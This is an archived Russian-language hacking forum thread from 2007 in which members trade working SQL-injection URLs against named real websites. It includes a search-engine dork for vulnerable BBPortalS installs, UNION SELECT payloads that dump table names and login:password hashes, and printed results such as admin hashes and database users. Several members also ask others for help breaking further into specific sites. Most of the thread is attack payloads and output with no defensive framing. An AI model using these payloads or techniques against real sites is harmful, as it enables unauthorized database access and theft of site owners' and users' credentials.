ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.10.2007, 15:00
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Уязвимость в BBPortalS <=2.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием tnews.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Поиск в гугл: inurl:"tnews.php?op"
Пример:
_www.actupix.net
Скуль:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12/*
Смотрим названия таблиц, меняя параметр limit:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.tables+limit+0,1/*
CHARACTER_SETS
COLLATIONS
----------
zypibot
85 таблиц.
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.tables+limit+84,1/*
Колонки:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12+from+information_schema.columns+limit+0,1/*
Таблица users:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12+from+users/*
Админ (меняем limit и смотрим других юзеров):
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12+from+users+limit+1,1/*
Admin:418685582e6f6e65516b90feaeab6518
Patrice:418685582e6f6e65516b90feaeab6518
PS Есть эксплоит
Последний раз редактировалось -=lebed=-; 22.10.2007 в 15:15..
|
|
|
22.10.2007, 16:55
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
Код:
http://www.ewebarchitecture.com/tip.php?id=-292+UNION+SELECT+1,2,3,4,5,6,7,8,9+from+admin/*
Помагите раскрутить  |
|
|
|
22.10.2007, 17:26
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Смотрим таблицы:
Код:
_http://www.ewebarchitecture.com/tip.php?id=-292+UNION+SELECT+1,2,3,4,5,6,table_name,8,9+from+information_schema.tables+limit+0,1/*
ЗЫ всё аналогично посту выше... (57 таблиц)
Последний раз редактировалось -=lebed=-; 22.10.2007 в 17:35..
|
|
|
|
22.10.2007, 18:01
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
ЛОгин пароль не могу найти
Таблицы вынул ...
И вот ещё
Код:
http://www.indonesia-ottawa.org/information/details.php?type=speech&id=-141+UNION+SELECT+1,2,concat(char(64,64),user,char(58),password,char(64,64)),4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+mysql.user/*
Нет вывода ХЭША пароля ... |
|
|
|
22.10.2007, 18:17
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от Xszz
И вот ещё
Нет вывода ХЭША пароля ...
Код:
http://www.indonesia-ottawa.org/information/details.php?type=speech&id=-141+UNION+SELECT+1,2,concat(char(64,64),user,char(58),password,char(64,64)),4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+mysql.user+limit+1,2/*
итд лимитом 2,2 3,2...
Последний раз редактировалось Nea7; 22.10.2007 в 18:20..
|
|
|
|
22.10.2007, 19:39
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
А рут все равно не показывает хэш ...
|
|
|
|
22.10.2007, 22:02
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
Код:
http://www.shacknews.com/featuredarticle.x?id=-520+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+FROM+accounts/*
Помагите вывести поля ICQ и Password .
У меня сайт еле загружается ...
Спасибо .. |
|
|
|
22.10.2007, 23:01
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
ru-board.com
яндекс Тиц - 1300
Google: PR - 4http://ru-board.com/new/article.php?sid=61'
http://ru-board.com/new/article.php?sid=61+and+1=1/*'
http://ru-board.com/new/article.php?sid=61+order+by+1/*'
нормального вывода нет мона попробовать раскрутить как блинд
http://ru-board.com/new/article.php?sid=61+and+substring(version(),1,1)=4/*'
з.ы. случайно под руку попалась)) специально не смотрел
з.ы.тут такое же
http://ru-board.com/new/print.php?sid=61+and+substring(version(),1,1)=4/*'
|
|
|
|
22.10.2007, 23:28
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
http://ru-board.com/new/print.php?sid=null+union+select+1,2,3,4,5,6/*
|
|
|
|
23.10.2007, 00:51
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.ofmycity.com/afisha/?a=seeitem&id=-1+union+select+1,2,3,4,5,6,concat(version(),0x2F,d atabase(),0x2F,user()),8,9/*
5.0.37-log/afisha/afishamoder@localhost
http://brand.xab.info/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,2,3,4,5,6,7,concat(version(),0x2F ,database(),0x2F,user()),9,10,11,12,13,14,15,16,17 ,18,19,20,21/*
4.0.24/xabinfo/portal@localhost
http://www.bodybuilding.spb.ru/index.php?lan=ru&cont=news&id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7/*
4.0.20-standard/whbody1/whbody1@localhost
http://www.zyll.net/news.php?id=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3,4,5,6,7/*
4.1.22-log/freemp3_slovo/freemp3_slovo@goliaph
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
